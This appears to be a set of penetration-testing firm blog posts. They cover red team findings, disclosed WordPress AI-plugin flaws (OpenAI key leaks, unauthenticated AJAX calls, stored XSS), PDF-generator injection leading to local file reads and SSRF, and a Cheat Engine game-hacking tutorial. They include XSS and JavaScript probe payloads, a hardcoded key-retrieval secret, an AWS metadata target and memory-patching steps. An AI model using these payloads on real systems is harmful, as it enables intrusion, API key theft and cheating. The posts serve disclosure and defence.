Flawed Foundations – Issues Commonly Identified During Red Team Engagements

Cybersecurity Red Team engagements are exercises designed to simulate adversarial threats to organisations. They are founded on real world Tactics, Techniques, and Procedures that cybercriminals, nation states, and other threat actors employ when attacking an organisation. It is a tool for exercising detection and response capabilities and to understand how the organisation would react in the event of a real-world breach.

One of outcomes of such exercises is an increased awareness of vulnerabilities, misconfigurations and gaps in systems and security controls which could result in the organisation’s compromise, and impact business delivery, causing reputational, financial, and legal damage.

Most of the time, threat actors rarely need to employ cutting edge capabilities or “zero day” exploits in order to compromise an organisation. This is because organisations grow organically, they exist to deliver their business, and as a result, security is not a key consideration from its founding, this means that critical issues can exist in the foundations of the organisation’s IT which threat actors will be more than happy to abuse.

This post covers five of the most common vulnerabilities we regularly see when conducting red team engagements for our clients. Its’s purpose is to raise awareness among IT professionals and business leaders about potential security risks.

Insufficient privilege management

This issue presents when accounts are provided with privileges within the organisation greater than what they require to conduct their work. This can present as: users who have local administrator privileges, accounts who have been given indirect administrator privileges, or overly privileged service accounts.

Some examples include:

  • Users who are all local administrators on their work devices –  This gives them the ability to install any software they might need to conduct their work, but also exposes the organisation to significant risk, should that device or user account become compromised. If users do require privileges on their laptops, then they should also be provided with a corporate virtual device (either cloud or on host based), which has different credentials from their base laptop, and is the only device permitted to connect to the corporate infrastructure. This will limit the exposure of the risk and permit staff to continue to operate. In a red team, this permits us to abuse a machine account, and gain the ability to bypass numerous security tools and controls which would normally impede our ability to operate.
  • Users with indirect administrator privileges – in Microsoft Windows Domains, users can belong to groups, however groups can also belong to other groups, and as a result users can inherit privileges due to this nesting. Whilst it was never the intention to grant  a user administrator privileges, and whilst the user is unaware that they have been given this power, such a misconfiguration can result quite easily and exposes the organisation to considerable risk. This can only be addressed through an in-depth analysis of the active directory and consistent auditing combined with system architecture. This sort of subtle misconfiguration only really becomes apparent when a threat actor or red team starts to enumerate the active directory environment; when found though it rapidly leads to a full organisation compromise.
  • Overly privileged service accounts – service accounts exist to ensure that specific systems such as databases or applications are able to authenticate users accessing them from the domain and to provide domain resources to the system. A common misconfiguration is providing them with high levels of privilege during installation even though they do not require them. Service accounts, due to the way they operate need to be exposed, and threat actors who identify overly privileged accounts can attempt to capture an authentication using the service. This can be attacked offline to retrieve the password, which can then lead to greater compromise within the estate. Service accounts should be regularly audited for their privileges, where possible these should be removed or restricted. If it is not a domain managed service account (a feature made available from Windows Server 2012 R2 onwards), then ensuring the service account has a password of at least 16 characters in length, which is recorded in a secure fashion if it is required in the future will severely restrict threat actors abilities to abuse these. Abuse of service accounts is becoming rarer but legacy systems which do not support long passwords means there are still significant amounts of these sorts of accounts present. Abuse of these accounts can often be tied to whether they have logon rights across the network or not – as identifying them being compromised can often be problematic if the threat actor or red team operate in a secure manner.

Poor credential complexity and hygiene

This issue presents when users are given no corporately supported method to store credential material; as a result passwords chosen are often easy to guess or predict, and they are stored either in browsers, or in clear text files on network shared drives, or on individual hosts.

  • Credential Storage – staff will often use plain text files, excel documents, emails, one notes, confluence,  or browsers to store credentials when there is no corporately provided solution. The problem with all of these options is that they are insecure – the passwords can be retrieved using trivial methods; which means the organisations are often one step away from a  significant breach. Password vaults such as LastPass, BitWarden, KeyPass, OnePass, etc. whilst targets for threat actors do offer considerably greater protection, as long as the credentials used to unlock them are not single factor, or stored with the wallet. It is standard practice for red teams and threat actors to try to locate clear text credentials, and attacking wallets significantly increases the difficulty and complexity of the tradecraft required when the material to unlock the wallet uses MFA or is not stored locally alongside it.
  • Credential Complexity – over the last 20 years the advice on password complexity has changed considerably. We used to advise staff to rotate passwords every 30/60/90 days, choose random mixes of uppercase, lowercase, numbers and punctuation, and have a minimum length; today we advise not rotating passwords regularly, and instead choosing a phrase or 3 random, easy to memorise words which are combined with punctuation and letters. The reason for this is because as computational power has increased, smaller passwords, regardless of their composition have become easier to break. Furthermore, when staff rotated them regularly, it would often result in just a number changing rather than an entirely new password being generated, as such they would also become easy to predict. Education is critical in addressing this. Furthermore many password wallets will also offer a password generator that can make management of this easier for staff whilst still complying with policies.  Too often I have seen weak passwords, which complied with password complexity policies because people will seek the simplest way to comply. Credential complexity buys an organisation time, time to notice a breach, raises the effort a threat actor must invest in order to be effective in attacking the organisation.

Insufficient Network Segregation

 This issue occurs when a network is kept flat – hosts are allowed to connect to any server or other workstations within the environment on any exposed ports regardless of department or geographical region. It also covers cases where clients  which connect to the network using VPN are not isolated from other clients.

  • VPN Isolation –  Clients which connect to the network through VPN to access domain resources such as file shares, can be directly communicated with from other clients. This can be abused by threat actors who seed network resources with materials which will force clients who load them to try to connect with a compromised host. Often this will be a compromised client device. When this occurs, the connecting host transmits encrypted user credentials to authenticate with the device. These can be taken offline by the threat actor and cracked which could result in greater compromise in the network.  Securing hosts on a VPN limits the threat actor, and red team in terms of where they can pivot their attacks, and makes it easier to identify and isolate malicious activities.
  • Flat Networks – networks are often implemented to ensure that business can operate efficiently, the easiest implementation for this is in flat networks where any networked resource is made available to staff regardless of department or geographical location, and access is managed purely by credentials and role-based access controls (RBAC). Unfortunately, this configuration will often expose administrative ports and devices which can be attacked. When a threat actor manages to recover privileged credentials then, a flat network offers significant advantages to them for further compromise of the organisation. Segregating management ports and services, breaking up regions and departments and restricting access to resources based on requirements will severely restrict and delay a threat actors and red teams ability to move around the network and impact services.

Weak Endpoint Security

Workstations are often the first foothold achieved by threat actors when attacking an organisation. As a result they require constant monitoring and controls to ensure they stay secure. This can be achieved through a combination of maintained antivirus, effective Endpoint Detection and Response, and Application Controls. Furthermore controlling what endpoint devices are allowed to be connected to the network will limit the exposure of the organisation.

  • Unmanaged Devices -Endpoints that are not regularly monitored or managed, increasing risk. Permitting Bring Your Own Device (BYOD) can increase productivity as staff can use devices they have customised; however it also exposes the organisation as these devices may not comply with organisation security requirements. This also compounds issues when a threat is detected, as identifying a rogue device becomes much more difficult as you need to treat every BYOD device as potentially rogue. Furthermore, you have little insight or knowledge as to where else these devices have been used, or who else has used them. By only permitting managed devices to your network and ensuring that BYOD devices, if they must be used, are severely restricted in terms of what can be accessed, you can limit your exposure to risk. Restrictions of managed devices can be bypassed but it raises the complexity and sophistication of the tradecraft required which means it takes longer, and there is a greater chance of detection.
  • Anti-Virus – it used to be the case that anti-virus products were the hallmark of security for devices. However, the majority of these work on signatures, which means they are only effective against threats that have been identified and are listed in their definitions files. Threat Actors know this and will often change their malware so that it no longer matches the signature and therefore can be evaded. This means the protection they offer is often limited but if well maintained, they can limit the organisations exposure to common attacks and provide a tripwire defence should a capable adversary deploy tooling that has previously been  signatured. Bypassing antivirus can be trivial, but it provides an additional layer of defence which can increase the complexity of a red team or threat actors activities.
  • Lack of Endpoint Detection and Response (EDR) configuration- EDR goes one step beyond antivirus and looks at all of the events occurring on a device to identify suspicious tools, behaviours, and activities that could indicate breach. Like anti-virus they will often work with detection heuristics and rules which can be centrally managed. However they require significant time to tune for the environment, as normal activity for one organisation, maybe suspicious in another. Furthermore it permits the organisation to isolate suspected devices. Unfortunately EDR can be costly, both to implement and then maintain correctly – and is only effective when it is on every device. Too often, organisations will not spend time using it, or understand the implementation of the basic rules versus tuned rules. As such false positives can often impact business, and lead to a lack of trust in the tooling. Lacking an EDR product severely restricts an organisation’s ability to detect and respond to threats in a capable, and effective manner. Well maintained and effective EDR that is operated by a well-resourced, exercised security team significantly impacts threat actor and red team activities; often bringing the Mean Time to Detected a breach down from days/weeks to hours/days.
  • Application Control – When application allowlisting was first introduced, it was clunky and often broke a lot of business applications. However it has evolved since those early days but is still not well implemented by organisations. It takes significant initial investment to properly implement but acts in a manner which can strongly restrict a threat actors ability to operate in an environment. Good implementations are based on user roles; most employees require a browser, and basic office applications to conduct their work. From there additional applications can be allowed dependent on the role, and users who do not have application control applied have segregated devices to operate on, which will help limit exposure. Without this, threat actors and red teams can often run multiple tools which most users have no use for or business using during their day jobs; furthermore it can result in shadow IT applications as users introduce portable apps to their devices which makes investigation of incidents difficult as it muddies the water in terms of if it is legitimate use or threat actor activity.

Insufficient Logging and Monitoring

If an incident does occur – and remember that red team engagements are also about exercising the organisation’s ability to respond; then logging and monitoring become paramount for the organisation to effectively respond. When we have exercised organisations in the past, we often find that at this stage of the engagement a number of issues become quickly apparent that prevent the security teams from being effective. These are almost often linked to a lack of centralised logging, poor incident detection, and log retention issues.

  • Lack of Centralised Logging: Threat actors have been known to wipe logs during their activities, when this occurs on compromised devices, it makes detecting activities difficult, and reconstruction of threat actor activities impossible. Centralising logs allows additional tooling to be deployed as a secondary defence to detect malicious activity so that devices can be isolated; it also means that reconstruction of events is significantly easier. Many EDR products will support centralised logging, however this is only true on devices which have agents installed, and on supported operating systems; therefore to make this effective additional tooling may need to be used such as syslog and Sysmon to ensure that logging is sent to centralised hosts for analysis and curating. Centralised logging can also be easier to store for longer periods of time, permitting effective investigations to understand how, what and where the threat actor/red team have been operating and what they accomplished before being detected and containment activities are undertaken.
  • Poor Incident Detection: Organisations which do not exercise their security teams often will act poorly when an incident occurs. Staff need to practice using SIEM (Security Information and Event Management) tooling, and develop playbooks and queries that can be run against the monitoring software in order to locate and classify threats. When this does not occur, identifying genuine threats from background user activity can become tedious, difficult, and ineffective, resulting in poor containment and ineffective response behaviours. When this occurs inn red teams, it can result in alerts being ignored or classed as false positives which leads to exacerbating an incident.
  • Log Retention Issues: many organisations keep at most, 30 days of logs – furthermore many organisations think they have longer retention than this as they have 180 days of alert retention, not realising that alerts and logs are often different. As a result we can often review alerts as far back as 6 months, but can only see what happened around those alerts for 30 days. A lot of threat actors know about this shortcoming, and will often wait 30 days once established in the network to conduct their activities to make it difficult for the responders to know how they got it, how long they have been there, and where else they have been. This often comes up in red teams as many red teams will run for at least 4 weeks, if not longer to deliver a scenario, which makes exercising the detection and response difficult when this issue is present.

Conclusion

These are just the 5 most common issues we identify when conducting a red team engagement; however, they are not the only issues we come across. They are fundamental issues which are ingrained in organisations due to a mixture of culture and lack or deliberate architectural design considerations.

Red team engagements not only help shine a light on these sorts of issues but also allows the business to plan how to address them at a pace that works for them, rather than as a consequence of a breach. Additionally, red team engagements can help identify areas where additional focus testing can help test additional controls, provide a deeper understanding of identified issues, and exercise controls that are implemented following a red team engagement.

Basically, a red team engagement is just the start or milestone marker in an organisation’s security journey. It is used in tandem with other security frameworks and capabilities to deliver a layered, effective security function which supports an organisation to adapt, protect, detect, respond and recover effectively to an ever-evolving world of cybersecurity threats.

Our Red Team services: https://prisminfosec.com/service/red-teaming-simulated-attack/

WordPress AI Plugins: Tell me a secret 

In our previous blog ‘WordPress Plugins: AI-dentifying Chatbot Weak Spots’ (https://prisminfosec.com/wordpress-plugins-ai-dentifying-chatbot-weak-spots/) a series of Issues were identified within AI related WordPress plugins:  

  • CVE-2024-6451 – Admin + Remote-Code-Execution (RCE) 
  • CVE-2024-6723 – Admin + SQL Injection (SQLi) 
  • CVE-2024-6847 – Unauthenticated SQL Injection (SQLi) 
  • CVE-2024-6843 – Unauthenticated Stored Cross-Site Scripting (XSS) 

Today, we will be looking at further vulnerability types within these plugins that don’t provide us with the same adrenaline rush as popping a shell, but clearly show how AI plugins are being rushed through development without thorough consideration for secure coding practices. Prism Infosec were attributed the following CVEs  

  • CVE-2024-6845 – SmartSearchWP < 2.4.6 – Unauthenticated OpenAI Key Disclosure 
  • CVE-2024-7713 – AI Chatbot with ChatGPT by AYS <= 2.0.9 – Unauthenticated OpenAI Key Disclosure 
  • CVE-2024-7714 – AI Assistant with ChatGPT by AYS <= 2.0.9 – Unauthenticated AJAX Calls 
  • CVE-2024-6722 – Chatbot Support AI <= 1.0.2 – Admin+ Stored XSS 

All vulnerabilities mentioned above were submitted to WPScan, who effectively managed the steps required to resolve the issues with the respective plugin owners.

CVE-2024-6845 – SmartSearchWP < 2.4.6 – Unauthenticated OpenAI Key Disclosure 

WPScan: https://wpscan.com/vulnerability/cfaaa843-d89e-42d4-90d9-988293499d26 

The plugin does not have proper authorisation in one of its REST endpoints, allowing unauthenticated users to retrieve the encoded key and then decode it, thereby leaking the OpenAI API key’ 

Within the plugin source code, namely the ‘wdgpt-api-requests.php’ file, an action was identified with a route of ‘/wp-json/wdgpt/v1/api-key’ that allowed unauthenticated requests to be sent to retrieve an encoded OpenAI Secret key that is configured within the plugin settings. 

Figure 1: wdgpt_retrieve_api_key identified in source code. 

Upon reviewing the ‘wdgpt_retrieve_api_key’ function, an interesting check was being performed on a ‘key’ parameter sent within the request whereby a comparison was being made on a (not so) secret code. 

Figure 2: Secret code exposed in source code alongside OpenAPI key decoding logic. 

In order for the request to be successful, a JSON value of {“key”:”U2FsdGVkX1+X”} needed to be sent within the POST request. 

This secret key remained unchanged across all plugin installation and by combining the secret key with the unauthenticated endpoint ‘/wp-json/wdgpt/v1/api-key‘, allowed for the retrieval of the ROT13 OpenAI secret key. 

Figure 3: OpenAI API key retrieval. 

Decoding the ROT13 key with the following Bash script unveiled the in use OpenAI key.  

#!/bin/bash 
echo "$1" | tr 'A-Za-z' 'N-ZA-Mn-za-m' 

CVE-2024-7713 – AI Chatbot with ChatGPT by AYS <= 2.0.9 – Unauthenticated OpenAI Key Disclosure 

WPScan: https://wpscan.com/vulnerability/061eab97-4a84-4738-a1e8-ef9a1261ff73 

The plugin discloses the OpenAI API Key, allowing unauthenticated users to obtain it’ 

Similar to the previous issue (but somehow worse), the OpenAI secret key was found to be disclosed to all users of the chatbot. The Authorization header contained the plaintext value of the API key set within the plugin configuration. This allowed an unauthenticated user to compromise the OpenAI secret key set in the application simply by sending a message through the chatbot.  

Configuration of the OpenAI API key resided within the admin console located at the following URL:  

  • /wp-admin/admin.php?page=ays-chatgpt-assistant&ays_tab=tab3&status=saved 

Once set, the chatbot functionality was available to unauthenticated users by default. By intercepting the request, it was identified that a client-side request was being sent directly to OpenAI, containing the secret key within the Authorization header.  

Request: 

POST /v1/chat/completions HTTP/2
Host: api.openai.com
Content-Length: 312
Sec-Ch-Ua: “Not/A)Brand”;v=”8″, “Chromium”;v=”126″
Content-Type: application/json
Accept-Language: en-US
Sec-Ch-Ua-Mobile: ?0
Authorization: Bearer sk-proj-oL…[REDACTED]…sez

{“temperature”:0.8,”top_p”:1,”max_tokens”:1500,”frequency_penalty”:0.01,”presence_penalty”:0.01,”model”:”gpt-3.5-turbo-16k”,”messages”:[{“role”:”system”,”content”:”Converse as if you are an AI assistant. Answer the question as truthfully as possible. Language: English. “},{“role”:”user”,”content”:”Hi there!”}]}

CVE-2024-7714 – AI Assistant with ChatGPT by AYS <= 2.0.9 – Unauthenticated AJAX Calls 

WPScan: https://wpscan.com/vulnerability/04447c76-a61b-4091-a510-c76fc8ca5664 

‘The plugin lacks sufficient access controls allowing an unauthenticated user to disconnect the plugin from OpenAI, thereby disabling the plugin. Multiple actions are accessible: ‘ays_chatgpt_disconnect’, ‘ays_chatgpt_connect’, and ‘ays_chatgpt_save_feedback’’ 

During source code analysis of the plugin, a ‘wp_ajax_nopriv’ function named ‘ays_chatgpt_admin_ajax’ was identified.  

Figure 4: Unauthenticated admin endpoint identified in source code. 

Upon further inspection of the function contained within the file ‘class-chatgpt-assistant-admin.php’, a ‘function’ parameter sent within the request was being checked to first confirm if a null value was present, before passing the value onto an ‘is_callable’ function, which is used to ‘Verify that a value can be called as a function from the current scope’.  

This essentially allowed for any function within the scope of ‘class-chatgpt-assistant-admin.php’ to be called.  

Figure 5: Function parameter value passed to is_callable() to access specified function. 

The functions that could be accessed from an unauthenticated context included:  

  • ays_chatgpt_disconnect 
  • ays_chatgpt_connect 
  • ays_chatgpt_save_feedback 

By sending the following request from an unauthenticated context it was possible to ‘disconnect’ the current running configuration from OpenAI, essentially performing a Denial of Service for the chatbot functionality.  

Figure 6: Disconnecting the plugin configuration from OpenAI. 
Figure 7: api_key setting updated to empty value. 

CVE-2024-6722 – Chatbot Support AI <= 1.0.2 – Admin+ Stored XSS 

WPScan: https://wpscan.com/vulnerability/ce909d3c-2ef2-4167-87c4-75b5effb2a4d 

The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup) 

Testing of the plugin identified that the settings functionality of the plugin did not effectively sanitise inputs, and as such allowed malicious payloads such as JavaScript code to be accepted and executed within the chatbot instances for visiting users.  

As seen in the screenshot below the payload ‘<img src=123 onerror=alert(document.cookie)>’ was inserted into the Starting Message input within the settings page located at: 

  • /wp-admin/options-general.php?page=chatbot-support-ai-settings 
Figure 8: XSS payload injected into chatbot starting message value. 

The result of this led to the JavaScript being executed within chatbot instances when users visit the application.

Figure 9: XSS payload triggered on new instance of chatbot. 

It is accepted that this vulnerability required administrator privileges to successfully set up the exploit, however, as this issue impacted all visiting users, this would allow malicious scripts to be distributed through the plugin, which could lead to further attacks against other third-party services through the guise of the visiting users’ resources.  

Get Tested

If you are integrating or have already integrated AI or chatbots into your systems, reach out to us. Our comprehensive range of testing and assurance services will ensure your implementation is smooth and secure: https://prisminfosec.com/services/artificial-intelligence-ai-testing 

All vulnerabilities were discovered and written by Kieran Burge of Prism Infosec.  

Breaking PDFs with Server-Side Shenanigans

Introduction

Generating PDFs from user supplied content is very common functionality within modern day Web Applications. Be it producing a receipt for an online purchase or generating a report based on user supplied content collected by the web application. There is endless application for this functionality.

Dynamic PDF generation holds significant potential for a wide range of applications, and as a result there are many third-party libraries (some open source) available that provide developers with the functionality of generating a dynamic PDF with user-supplied content.

The following sections will break down the potential attack surface that may be exposed once such functionality is implemented in a web application, discussing how to identify vulnerabilities, some known attacks as well as how to mitigate against this type of issue.

Background

Many third-party libraries exist to perform the task of PDF generation, many libraries available take in HTML and CSS code and use it to structure layout of the final PDF.

Popular Third-Party Libraries

  • PDFKit – JavaScript
  • iText – Java
  • Wkhtmltopdf – C++
  • FPDF – PHP
  • IronPDF – .NET

There are checks that can be performed to identify what library and sometimes what version of the library is in use. Checking the ‘Document Properties’ of a PDF will often leak the “PDF Producer” in the document meta-data.

An example below is the document properties of an invoice generated by Amazon for a recent online purchase, as seen highlighted in the figure below the “PDF Producer” has provided us what library is being used as well as the specific version of that library:

Often checking the Document Properties will provide a clear indication on if the PDF has been generated client-side or server-side. It is safe to assume that the PDF related to the screenshot above has been generated server-side using iText 2.0.8.

Basic Discovery

The first check is identifying the vulnerable input by attempting to inject some additional HTML elements into the page to understand how the application handles it. Adding in some <h1> tags before your input will suffice and will make it clear when a potentially vulnerable input has been identified.

In performing this check, the tester will be able to confirm two things:

  • The application does not correctly sanitise user-input.
  • The application does not encode “malicious” characters.

The result:

Exploit

Now we’ve confirmed its possible to add additional HTML how can this vulnerability be exploited further? How does the application handle ‘<script>’ or ‘<img>’ tags?

Attempt to use any of the following scripts to identify the presence of JavaScript, note that depending on implementation and configuration the <script> tags may be disabled. However, how about being more creative by using other HTML elements.

Basic Discovery Scripts

  • <img src=”x” onerror=”document.write(document.location.href)” />
  • <script>document.write(JSON.stringify(window.location))</script>
  • <svg/onload=document.write(document.location.href)>

The result:

Instead of the PDF generator simply rendering the code as text on the screen, it is attempting to run the script server-side allowing us to write the ‘document.location.href’ to the page.

Once you have confirmed that it is possible to inject HTML and JavaScript into the document for the server to run, what else is achievable?

Local File Inclusion

“The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a “dynamic file inclusion” mechanisms implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation.” – OWASP https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion

It is possible to leverage this vulnerability to include a local file on the server and render the contents of the file into the PDF document.

Consider using one of the following scripts:

The result:

In this example, specifically the contents of the /etc/passwd file is displayed, however depending on library and its implementation. It may be possible to read any file – such as SSH keys to gain unauthorised access to the system or reading configuration files for plain-text passwords to elevate privileges on the application.

Server-Side Request Forgery

“In a Server-Side Request Forgery (SSRF) attack, the attacker can abuse functionality on the server to read or update internal resources. The attacker can supply or modify a URL which the code running on the server will read or submit data to, and by carefully selecting the URLs, the attacker may be able to read server configuration such as AWS metadata, connect to internal services like http enabled databases or perform post requests towards internal services which are not intended to be exposed.” – OWASP https://owasp.org/www-community/attacks/Server_Side_Request_Forgery

As we have confirmed with our previous attack that it is possible to create and send XMLHttpRequests inside <script> tags we can attempt to abuse this functionality to identify any internal services running.

If a web server is hosted within an AWS environment, then a malicious user may be able to leverage access by extracting important configurations and sometimes even authentication keys by accessing the internal REST interface located at http://169.254.169.254/latest/meta-data. By default, the AWS EC2 REST metadata service is only accessible from the specific EC2 instance its associated with and should never be exposed externally. However, with this vulnerability requests will be coming from the server and the responses are being rendered to the PDF, allowing us to access the service.

Useful AWS endpoints to query

Prevention/Conclusion

Though a very serious issue when exploited fully, the issue in most scenarios is relatively easy to fix/prevent. After walking through some basic discovery methods and some sample attacks it is possible to identify the weaknesses in the POC above.

  • Input Validation
  • Output Encoding

The application makes no effort to validate any of the input received from a user, in the scenario above it is possible to insert HTML and JavaScript code into the address field of our form. Therefore, the application is not checking if a valid address has been supplied, nor is the application validating that the input supplied is only text before sending to the web server.

Additionally, the application made no effort to encode any of the data supplied by a user. By default, PDFs render HTML entities correctly if an associated entity code is supplied, therefore an extra measure to assure that a payload will not trigger and instead be rendered as text (if a user is able to bypass the input validation) is to convert ‘dangerous’ characters to their associated HTML entity.

CharacterHTML Character Entities
&&amp;
<&lt;
>&gt;
&quot;
'

It is also often worth checking the PDF generator libraries development documentation to check if there are any additional optional security controls that could protect the application from being exploited further. Specific to the example, the application is making use of the Wkhtmltopdf library to generate PDFs, reading the developer documentation will show that the local file inclusion vulnerability could be prevented by rendering PDFs using the ‘–disable-local-file-access’ flag to prevent the tool from accessing local files.

In conclusion, there is nothing new about this vulnerability, yet it is not uncommon to find vulnerabilities of this type during a web application assessment. Though ‘simple’ to resolve this type of vulnerability is easy to overlook especially if a developer is unaware of the potential issues surrounding the functionality. The golden rule still applies that a developer should never implicitly trust user supplied content and should always check the supplied input against an approved list of whitelisted characters as to assure only text submitted to the application.

Blog post was written by Jeremy Griffin of Prism Infosec.

Unveiling the Virtual Battlefield: A Journey into Game Hacking and Reverse Engineering

In the ever-evolving realm of digital entertainment, where creativity converges with cutting-edge technology, a subversive art form emerges — game hacking. Beyond the pixels and polygons lies a labyrinth of code waiting to be deciphered, manipulated, and reimagined. This intriguing practice not only kindles the flames of curiosity but also serves as a pivotal gateway into the realm of reverse engineering. Aspiring enthusiasts seeking to unravel the enigma of game hacking often find themselves treading the path of reverse engineering, a domain intertwined with the understanding of software, memory structures, and the inner workings of programs.

At its core, game hacking is a captivating pursuit that involves exploring the intricate tapestry of video games, probing for chinks in their digital armour, and bending the rules to one’s advantage. It’s the art of peering beneath the glossy surface of gaming universes to understand the mechanisms that govern them. Be it harnessing superhuman abilities, manipulating in-game economies, or altering the very fabric of virtual reality, game hacking offers an avenue for players to transcend the constraints set by developers.

One of the foundational concepts that underpins game hacking and reverse engineering is the storage of values in a game’s memory. Games, like finely choreographed performances, rely on the synchronisation of various elements. Whether it’s the player’s health, ammunition count, or the score, these values find their abode within the memory of a running game. Unravelling the enigma of memory storage not only grants insights into a game’s mechanics but also equips the budding hacker with the power to manipulate these values at will.

This blog post will serve as an introduction into game hacking/reverse engineering and the use of cheat engine. Towards the end of the post, Prism Infosec will look at tricks and techniques game developers can use to prevent tampering with their games. To follow along fully with this post, it is recommended that the reader has a basic level of understanding of reverse engineering.

Cheat Engine in a Nutshell

Cheat Engine is essentially a memory scanner and editor, acting as a bridge between the player’s intentions and the game’s codebase. The process begins by selecting a game process to analyse. Cheat Engine scans the game’s memory space, a realm where values like health, score, or resources reside. It does so by systematically examining memory addresses, each of which holds a specific value. By altering these values, players can, for instance, boost their character’s health, acquire infinite ammunition, or acquire unlimited gold.

Once the desired value is located, Cheat Engine reveals its true prowess: freezing, modifying, or even injecting new values into the game’s memory.

Starting off, we have the main Cheat Engine UI. Majority of the functionality will be glossed over for this post, but the core functionality will be focused on.

Highlighted below are the following functions:

  1. The “Scan Type” selection allows users to define the type of search they want to conduct within the game’s memory. Whether it’s an exact value, a value increased or decreased by a certain amount, or a value that has changed, this option shapes the nature of the scanning process.
  2. Users can choose the “Value Type” to specify the data format of the value they’re seeking. Whether it’s an integer, floating-point number, or another data structure, this setting ensures accurate scanning and manipulation.
  3. In the “Value” field, users input the specific numerical value they’re searching for within the game’s memory. Coupled with the other search criteria, this parameter guides Cheat Engine in locating and interacting with the desired value in the game’s code.
  4. The “First Scan” feature serves as the initial stride in Cheat Engine’s memory scanning process. It combs through the game’s memory for values that meet the specified criteria, setting the stage for further refinement.

A Practical Example

Finding values in memory

For this blog post, a third person, click and point style RPG game was chosen. The game lets users’ level up, collect weapons and defeat enemies, among a whole lot of other things.

During games, it is common for players to die a lot, but what if this could be prevented by giving the player infinite health or change it so the health value never drops? Using cheat engine it is possible to manipulate the health value to do so.

Conveniently, the game displays the value of the current players health when hovering over the UI elements.

For this game, it is assumed that the values of the data types will be 4 bytes in size. Below, by searching for the health value and clicking “First Scan”, a list of possible results are displayed. Note the “Address” column, which displays the memory address that holds the value. The “First” column is what the value was first observed as and the “Previous” column, is what the value was before it changed (or if it changed).

As the scan has generated over 125 results, it cannot be determined straightaway what the health value is. A good way to narrow down the results is to change the value in some way, in this instance, the player can take damage from a monster to decrease the value.

After taking damage, below in the bottom left hand corner, notice the health value has now changed to 318:

Scanning for the updated value in memory by selecting “Next Scan” (which searches based on the previously searched value to narrow down the search results), you will notice there is a change in the number of results, in this case there is now 3:

At this point, it still can’t be determined which address holds the health value, so the next step is to try and manipulate each one to see if it affects the on-screen value. By double clicking each value, they have now been added to the address list in the bottom pane in the main cheat engine window.

Using trial and error to manipulate the address’ and their corresponding values, should narrow down the health value. By clicking the toggle box in the left-hand column, it is possible to freeze a value. Freezing a value, means that in theory, it should not change:

Now, when taking damage again from a monster, the value should not change from 318. However, after taking damage, notice in the below screenshot that the health value has in fact changed:

So, it can now be ruled out that wasn’t the correct value. By rinsing and repeating the above steps on the remaining two address’, it is apparent that neither is the correct health value.

Where next?

Incorrect values

When trying to find a value in memory, it is often assumed what the data type will be, in this case, a 4-byte integer for the health value. In reality, most games will store values like health, in a float value.

When scanning memory concludes the wrong, or no results, it is often worth changing the data type to see if that will identify the correct one.

In this example, changing the value type to a float, gave 273 results. To not repeat the above steps to narrow down the results and save time, it can be assumed that two potential values have been identified:

After taking damage from an enemy:

With the two values identified, freezing one of the values should rule out the correct one:

By taking damage again, it can be determined which value is correct:

As the health decreased, the first value froze was incorrect. Freeze the next value:

Now entering combat and observing the health value, it is the correct value as no damage is taken:

Cheat Engine Debugger Functionality

Cheat Engine comes packaged with a built-in debugger, among many other things, that can allow the end user to walk through the underlying assembly code to gain a deeper understanding of the game’s functionality and logic.

Using the health value as an example, if we right click on the value and select “Find out what writes to this address”, cheat engine will launch the debugger and show what address’ interact with the health value:

Taking damage from an enemy should populate the debugger window with activity:

After taking damage, the debugger window will now show the address, opcodes and instructions which wrote to the health value address:

Selecting the “Show disassembler” option will display the assembly instructions listed above and surrounding instructions:

As the highlighted instructions above are the ones that write to the health value address and thus dictate the damage the player takes, it would be beneficial to remove these instructions, so the player takes no damage. Luckily, cheat engine has built in functionality to do this, by right clicking the instruction and selecting “Replace with code that does nothing”:

The result is that Cheat Engine has overwritten the assembly instructions with the “nop” keyword, which means “no operation” that will simply do nothing when ran:

Now, when going into combat, no damage will be taken:

Identifying structures and values in memory

Whilst using the methodology above to find other values, such as mana, or number of potions the player has, is still valid, there are easier methods to quickly find these values in memory.

When a game developer creates a player object, they will typically assign values such as health, mana, energy, experience, player name and more in the same class or structure. Using this assumption, after a value such as health has been located, the surrounding values in memory should all be relevant to the character in some way.

This can be seen in action by utilising the in-memory structure capabilities of Cheat Engine. Going back to the health value, once identified, right click and select “Disassemble this memory region”:

Select Tools menu at the top, then “Dissect data/structures”:

On the following screen, select the “Structures” menu and then “Define new structure”:

This effectively takes the current memory region, in this case from the health value and attempts to group other values in that memory region into a formatted structure as seen below:

A lot of the values displayed, such as float, byte, etc, will be Cheat Engine guessing the value types to display them.

Observing the values, one jumps out straight away, the mana value:

Scrolling further down the list, it is possible to see other values such as gold:

Changing the gold value:

Fame value:

Player strength values:

Messing with game memory values can mess up the fairness of the game, like changing scores on leaderboards or player stats. By falsifying values to impress friends or show off on online forums, messes with the trust among players and makes real achievements seem fake, causing doubt and breaking the friendly vibe among gamers:

Prevention

To prevent efforts to hack or manipulate a game, developers have a few options:

Encrypted values:

Encrypting memory values makes finding initial starting values such as health, difficult to find. This adds an extra layer of complexity for hackers attempting to uncover sensitive information.

Code Integrity Checks:

Code integrity checks involve adding mechanisms that verify the integrity of the game’s executable code during runtime. This can include checksums or hashing algorithms that ensure the code hasn’t been tampered with. If a hacker attempts to modify the code, these checks will detect the alteration and can trigger anti-cheat measures or even prevent the game from running.

Anti-Cheat Software:

Dedicated anti-cheat software employs various techniques to detect and prevent cheating. This can range from heuristic analysis of running processes to signature-based detection of known cheats. Anti-cheat tools often work alongside the game client, scanning for unauthorised modifications or abnormal behaviour. When a cheat is detected, the anti-cheat software can take action, such as issuing warnings, suspending accounts, or banning players.

Server-Side Validation:

If a game utilises online connectivity and cross-play, server-side validation means that critical game actions and data are verified on the game server, not just on the player’s device. This prevents players from manipulating or forging data on their end. For example, if a player claims to have achieved a high score, the server verifies the legitimacy of the claim before updating the leaderboard. This approach minimises the impact of client-side hacks and ensures the accuracy of game state.

Randomised Memory Addresses:

Randomising memory addresses involves changing the memory location of key variables, functions, or data structures each time the game is launched. This makes it challenging for hackers to find and manipulate specific values consistently across different game sessions. As they need to identify new memory addresses with each playthrough, it significantly increases the complexity of reverse engineering and cheating attempts.

Anti-Debugging Techniques:

